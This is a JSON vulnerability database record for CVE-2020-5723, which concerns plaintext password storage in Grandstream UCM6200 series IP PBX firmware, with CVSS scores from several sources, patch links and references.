                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          }
        ]
      },
      "cve": "CVE-2020-5723",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5723",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003514",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-20679",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5723",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003514",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5723",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003514",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-20679",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1713",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-5723",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5723",
            "trust": 3.1
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "id": "VAR-202003-1436",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.279000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "UCM6200 series",
            "trust": 0.8,
            "url": "http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series"
          },
          {
            "title": "Patch for Grandstream UCM6200 privilege elevation vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/211855"
          },
          {
            "title": "Grandstream UCM6200 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113108"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-312",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5723"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5723"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/312.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-03-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "date": "2020-04-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "date": "2020-03-30T20:15:19.883000",
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "date": "2020-04-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "date": "2020-04-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "date": "2024-11-21T05:34:29.200000",
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "UCM6200 Vulnerability in plaintext storage of important information in series",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          }
        ],
        "trust": 0.6
      }
    }